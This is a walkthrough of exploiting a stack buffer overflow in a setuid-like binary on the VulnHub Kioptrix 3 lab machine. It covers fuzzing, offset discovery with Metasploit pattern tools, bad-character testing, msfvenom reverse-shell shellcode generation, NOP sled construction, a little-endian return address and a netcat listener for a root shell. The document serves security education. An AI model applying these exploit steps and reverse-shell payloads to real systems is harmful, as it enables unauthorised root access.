Linux Stack Based Buffer Overflow x86

What is a buffer overflow?

A buffer overflow occurs when a program receives more input than the buffer set aside for it can hold and has not been coded to handle this gracefully, so the extra input spills into adjacent locations in memory and overwrites them. A properly coded program checks the length of its input so that excess data cannot corrupt memory.

The below example shows what happens when a buffer overflow occurs.

CPU Registers and Memory pointers

When a program first starts, it is loaded from the hard disk into memory, where it can be read from and written to much faster than on the hard drive. The CPU keeps its place in the code with an instruction pointer. The pointer steps through the code one instruction at a time, and the CPU executes each instruction in turn.

Programs are designed to jump around, store values (variables) and reuse segments of code. These variables are stored in memory locations, and the CPU registers keep track of those locations and jump points so that, while the program is running, execution is sent to the correct locations in memory.

For buffer overflows, the three most important CPU registers are EIP, EBP and ESP.

EIP: Extended Instruction Pointer. This holds the address of the next instruction to be executed.

ESP: Extended Stack Pointer. This points to the top of the stack.

EBP: Extended Base Pointer. This points to the base of the current stack frame.

Why is this bad?

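EIP holds the address of the next instruction to be executed. When a function is called, the address to return to is saved on the stack and loaded back into EIP when the function finishes. If a user can overflow a buffer on the stack and overwrite that saved address with their own input, then the user can point EIP to any memory location they wish.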
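To make this concrete, here is a minimal Python 3 sketch of a toy stack frame. The 16-byte buffer size and the two addresses are made-up values for illustration only, and `unchecked_copy` is a hypothetical stand-in for an unsafe C copy such as strcpy.

```python
import struct

BUF_SIZE = 16  # hypothetical buffer size, chosen only for illustration


def make_frame(saved_ebp, return_addr):
    """Lay out buffer, saved EBP and saved return address from low to high addresses."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<II", saved_ebp, return_addr))


def unchecked_copy(frame, data):
    """Copy data to the start of the frame without checking it against BUF_SIZE."""
    frame[0:len(data)] = data
    return frame


def saved_return_address(frame):
    """Read back the 4 bytes that would be loaded into EIP on return."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


frame = make_frame(0xBFFFF8A8, 0x08048456)
unchecked_copy(frame, b"A" * 12)           # fits inside the buffer
print(hex(saved_return_address(frame)))    # 0x8048456

unchecked_copy(frame, b"A" * 24)           # 8 bytes too many
print(hex(saved_return_address(frame)))    # 0x41414141
```

The second copy runs past the buffer, through the saved EBP and into the saved return address, which is why the value that ends up in EIP is made of the attacker's own bytes.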

Walkthrough of a Buffer Overflow

For this example I will use a box I recently completed on VulnHub called Kioptrix 3. After gaining an initial foothold on a user account and enumerating the machine, I found a binary that ran with superuser privileges. It turned out that this was exploitable via a buffer overflow.
Running the HT program without any arguments with sudo:
Running the program with arguments shows that it was indeed loading in the argument passed to it and trying to run the program.

Testing for Buffer Overflow aka: Fuzzing

Seeing as we can send arguments to the program, let's try passing in an argument of 1000 characters. For this I will use Python, as it happens to be installed and the interpreter can be run directly from the command line to pass arguments to the HT program. I will pass in 1000 ‘A’ characters:
sudo ht $(python -c "print 'A' * 1000")
No crash:
Trying with 10,000 “A” characters.
This caused a segmentation fault, i.e. an invalid memory access that made the program crash. It looks like at some point our 10,000 As spilled over into EIP, causing EIP to point to the address AAAA, or in hex \x41\x41\x41\x41.
This is what has actually happened:

Confirming EIP was overwritten

Now that we have confirmed that a buffer overflow is occurring, we need to examine the program while it is running in memory so we can locate EIP and then point it to our malicious code. I will be using a command line debugger called GDB, as it happens to be installed on the machine I am exploiting.
Start GDB and set it to display disassembly in Intel syntax:
gdb -q /usr/local/bin/ht
set disassembly-flavor intel
Fuzzing the program within GDB to find roughly how many A’s it takes to overflow the buffer and overwrite EIP:
(Note: this took some back and forth to narrow down roughly where the crash occurred. Too many A’s resulted in EIP being overwritten by other parts of memory, which replaced our A’s. To narrow it down, I found that it crashed after 4500 bytes and did not crash before 3500 bytes. I then stepped up 200 bytes each time to catch the crash with our A’s written into EIP.)
NOTE: I used U instead of A for this example however it makes no difference. 4 bytes are 4 bytes….
run $(python -c "print 'U' * 3600")
run $(python -c "print 'U' * 3800")
run $(python -c "print 'U' * 4000")
run $(python -c "print 'U' * 4200")
Since we got a crash, GDB pauses the program exactly where the crash occurred and lets us examine it. Viewing the CPU register information, we can see that EBX, ESI, EDI and EIP have all been overwritten by the letter ‘U’. The registers show 55 because U in hex is \x55.
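As a quick check of the hex values mentioned so far, the following Python 3 sketch converts the filler characters into the values a debugger would display. The helper name `as_register_value` is my own and is not part of GDB.

```python
import struct


def as_register_value(four_bytes):
    """Interpret 4 bytes as the 32-bit little-endian value a register would show."""
    return struct.unpack("<I", four_bytes)[0]


print(hex(ord("A")), hex(ord("U")))       # 0x41 0x55
print(hex(as_register_value(b"AAAA")))    # 0x41414141
print(hex(as_register_value(b"UUUU")))    # 0x55555555
```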
Determining the Offset and controlling EIP

Now that we have overwritten EIP we need to find at exactly which point our bytes filled into EIP. We know that it happened somewhere between 4000 bytes and 4200 bytes. The easiest way to do this is to generate a completely unique string of 4200 bytes and then check the bytes that landed into EIP and locate those bytes in our 4200 unique string. This will tell us at exactly which point our bytes landed into EIP.

Metasploit comes with a pattern creation tool for exactly this purpose. Run the tool with the -l switch followed by the length of the unique string to generate, in our case 4200.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4200


Now instead of sending 4200 ‘U’ characters into the program we now send this unique string.

run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5…<SNIP>…Bn6Bn7Bn8Bn9'")

EIP has now been overwritten by 4 unique bytes that we can copy and use to find the exact location in our 4200 unique string.

Metasploit contains a tool for finding our offset using this value:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x34674633
[*] Exact match at offset 4091
This tells us that it took exactly 4091 bytes to reach EIP and the next 4 bytes are 0x34674633.
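For readers curious how the offset lookup works, here is a rough Python 3 sketch of the same idea. It is not Metasploit's code. `pattern_create` and `pattern_offset` are my own function names, and the sketch assumes the pattern is built from upper-case, lower-case and digit triples, as the Aa0Aa1Aa2 prefix suggests.

```python
import string
import struct


def pattern_create(length):
    """Build an Aa0Aa1Aa2... style pattern of the requested length."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if 3 * len(triples) >= length:
                    return "".join(triples)[:length]
    raise ValueError("requested length exceeds the 20280-byte pattern")


def pattern_offset(eip_value, length):
    """Find where the 4 bytes seen in EIP sit inside the pattern."""
    # EIP is read as a little-endian integer, so unpack it back into byte order.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_create(18))                  # Aa0Aa1Aa2Aa3Aa4Aa5
print(pattern_offset(0x34674633, 4200))    # 4091
```

The value 0x34674633 corresponds to the characters 3Fg4 in memory order, and that sequence starts 4091 bytes into the pattern, which agrees with the tool output above.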
Our memory now looks like this:

Before creating our malicious shellcode we must first confirm that we control EIP. Instead of sending 4200 ‘U’ characters and causing a crash, we will send 4091 U’s followed by 4 A’s. This should result in the memory before EIP being overwritten by 55 (the hex value for U) and EIP being overwritten by exactly four 41s (the hex value for A). The total length of our buffer including EIP is 4095 (4091 for the offset plus 4 for EIP).

run $(python -c 'print "\x55" * (4095 - 4) + "\x41" * 4')

And as expected, the four A’s have landed perfectly into EIP 🙂
Now that we have confirmed we can control EIP to point to any memory location we wish, we can create our malicious code which we will then point to with the EIP register.

Before creating final shellcode

Before creating shellcode there are a few cleanup tasks that need to be done to ensure our code executes cleanly. The first is to ensure we have enough room to fit our code within the buffer: our code must be shorter than 4091 bytes. Additionally, we need to pad our code to create empty space between ESP (the top of the stack) and the start of our code. The first reason for creating this space is the technique we are going to use, which will be explained later. The second is that the stack can move about and “wobble” as other programs and functions run, pushing and popping things in other memory segments.

Get the size of shellcode

To create our shellcode I will be using another one of Metasploit's tools, called msfvenom. Msfvenom makes it extremely easy to whip up simple backdoors and reverse shells. The reverse shell I will be using for this is a standard TCP reverse shell, output as C shellcode:

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=6000 --platform linux --arch x86 --format c
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =

Identify and remove bad characters

The second cleanup task is identifying any bad characters in our shellcode that could be interpreted by the program and cause our exploit to fail. For example, the newline character is 0x0a in hex, so if our shellcode contains a 0x0a byte, the program may treat it as a line break and our code will not run. We do not know how the HT program was written or which characters it treats specially, so to find the bad chars we need to submit the entire hex table to the HT program and examine it in memory on the stack, noting down any missing characters, which indicate “bad chars”.

Because we are submitting fewer than 4091 characters, which will not crash the program, we need to set up a breakpoint that stops the program when it runs the function that takes our supplied argument, so we can examine it directly in memory.
Start a fresh GDB session to completely clear out memory and then run “disassemble main”. This shows the disassembly of main, including the functions it calls. From the below output we can see that there is a call to a function called <_Z10ht_strlcpyPcPKcj>, which looks like a string copy function. Let's set a breakpoint there, run our hex table through the program and see if it hits our breakpoint.
Now submit the hex table and see if our breakpoint gets hit. Note how I am still utilising our entire buffer size: I simply subtract the 256 bytes of the hex table and the 4 bytes of EIP from the x55 filler, then add the 4 byte EIP back at the end. The string we are sending looks like this:
3835 x55, 256 hex table, 4 x66
We hit our breakpoint at the function ht_strlcpy, whose mangled name is _Z10ht_strlcpyPcPKcj. Viewing the breakpoint info shows that ht_strlcpy accepts a char pointer, a const char pointer and an unsigned int. It looks like this is where the overflow is occurring.
Read 5000 bytes of the stack, starting 2000 bytes above ESP:
x/5000xb $esp+2000
You can see in memory our first 3835 x55 bytes and, after scrolling down for a bit, they are immediately followed by the hex table we added, finished off with the 4 x66 bytes.
Beginning of hex chart
End of hex chart with 4 bytes at the end
Now we need to read each value off the hex chart and note down any missing hex values.
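Reading the table by eye is error-prone, so the comparison can also be scripted. The Python 3 sketch below is only an illustration: `hex_table` and `missing_bytes` are my own helper names, and the dump is simulated rather than taken from the real GDB session.

```python
def hex_table():
    """All 256 byte values in order, as submitted to the program."""
    return bytes(range(256))


def missing_bytes(sent, seen_in_memory):
    """Return the byte values that were sent but never appear in the dump."""
    seen = set(seen_in_memory)
    return [value for value in sent if value not in seen]


# Simulated dump: a hypothetical program that drops NUL, tab, newline and space.
dropped = {0x00, 0x09, 0x0A, 0x20}
dump = bytes(value for value in hex_table() if value not in dropped)

print(["%02x" % value for value in missing_bytes(hex_table(), dump)])
# ['00', '09', '0a', '20']
```

In practice only the bytes from the hex table region of the dump should be passed in, since filler such as x55 elsewhere in memory would hide a missing 0x55.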
The bad characters identified are: \x00, \x09, \x0a and \x20
Create shellcode excluding the bad chars
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=6000 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
Notice that our shellcode is now 95 bytes. To remove the bad chars, the new payload was encoded with the shikata_ga_nai encoder.


We now have our total buffer size of 4095 bytes, our final shellcode of 95 bytes, and our EIP of 4 bytes. That leaves us with 3,996 bytes of additional space in our buffer that we need to fill with something. But what? I mentioned before that memory “wobbles” around as other parts of memory are altered, so how can we point EIP to the start of our shellcode if the exact address is likely to change? If we fill the leftover 3,996 bytes with x55, then there is a good chance we will land on those instead of our shellcode.

Introducing NOPs

NOP is short for “No-Operation”, and it does exactly what the name says. When the instruction pointer lands on a NOP, the CPU does nothing and moves on to the next instruction. So to get around the wobble in memory, we can fill the first 3496 bytes of our buffer with x55, then add 500 bytes of NOPs followed by the 95 bytes of our shellcode, and point our 4 byte EIP to a memory address in the middle of the NOPs. This way it does not matter if execution does not land on exactly the address we chose: as long as it lands somewhere in the NOPs, it moves to the next NOP, and then the next, until it slides down all of the NOPs and lands bang on our shellcode. This type of attack is called a “NOP sled”, as the instruction pointer slides down the NOPs like a sled down a mountain.
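The sliding behaviour can be shown with a toy model in Python 3. This is only a simulation over a byte string, not real execution, and the x44 bytes are placeholders standing in for the shellcode. The function name `slide` is my own.

```python
NOP = 0x90


def slide(memory, entry):
    """Step past consecutive NOP bytes from entry and return where real code begins."""
    position = entry
    while position < len(memory) and memory[position] == NOP:
        position += 1
    return position


filler = b"\x55" * 3496
sled = b"\x90" * 500
payload = b"\x44" * 95    # placeholder bytes standing in for the shellcode
memory = filler + sled + payload

payload_start = len(filler) + len(sled)
for entry in (3496, 3700, 3995):    # any position inside the sled
    print(entry, "->", slide(memory, entry))
```

Every entry point inside the sled ends up at the same position, the first byte after the NOPs, which is why the address written into EIP only needs to be approximately right.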
After adding NOPs to our buffer it should look like this:
Buffer = "\x55" * (4095 - 500 - 95 - 4)
NOPs = "\x90" * 500
Shellcode = "\x44" * 95
EIP = "\x66" * 4
Running this through GDB and checking the stack when it hits the break point:
run $(python -c 'print "\x55" * (4095 - 500 - 95 - 4) + "\x90" * 500 + "\x44" * 95 + "\x66" * 4')
The first 3496 bytes of the buffer are filled with x55, followed by 500 x90 (NOPs), then 95 x44 for our shell and finally the 4 x66 for EIP:
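The arithmetic behind this layout is easy to get wrong by a byte or two, so it can help to check it in code. The Python 3 sketch below uses the same placeholder bytes as the test run. `build_layout` and the constant names are my own.

```python
OFFSET_TO_EIP = 4091    # offset reported by pattern_offset.rb
NOP_COUNT = 500


def build_layout(shellcode, return_address):
    """Assemble filler + NOP sled + shellcode + 4-byte return address."""
    if len(return_address) != 4:
        raise ValueError("a 32-bit return address is exactly 4 bytes")
    filler_len = OFFSET_TO_EIP - NOP_COUNT - len(shellcode)
    if filler_len < 0:
        raise ValueError("NOP sled plus shellcode exceed the offset to EIP")
    return b"\x55" * filler_len + b"\x90" * NOP_COUNT + shellcode + return_address


# Placeholders only: x44 stands in for the shellcode, x66 for the address.
buf = build_layout(b"\x44" * 95, b"\x66" * 4)
print(len(buf), buf.index(b"\x90"), buf.index(b"\x44"), buf.index(b"\x66"))
# 4095 3496 3996 4091
```

Computing the filler length from the offset, rather than typing it in, keeps the return address at byte 4091 even if the shellcode size changes.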
The next step is to replace the 95 x44 bytes with our shellcode.
The final step is to find a memory address within the NOPs and point EIP to it.
x86 CPUs store multi-byte values in memory with the least significant byte first, so we need to enter this address into EIP in reverse byte order. This is known as “Little Endian” format. Our chosen address, 0xbffff85c, looks like this in EIP: \x5c\xf8\xff\xbf
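Rather than reversing the bytes by hand, the conversion can be done with Python's struct module. This is a small Python 3 sketch, and `to_little_endian` is my own helper name.

```python
import struct


def to_little_endian(address):
    """Pack a 32-bit address into the byte order x86 expects in memory."""
    return struct.pack("<I", address)


print(to_little_endian(0xBFFFF85C).hex())    # 5cf8ffbf
```

The "<I" format means an unsigned 32-bit integer in little-endian order, so the least significant byte, 5c, comes first.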


Before executing the exploit we need to set up our listener. We set our payload to connect to our IP address on port 6000. I will be using netcat for simplicity; for post exploitation, however, a Metasploit handler would be better.
nc -lnvp 6000
Run the exploit through the ht program with sudo so our code is executed with superuser privileges, then catch the connection, which gives root access to the machine.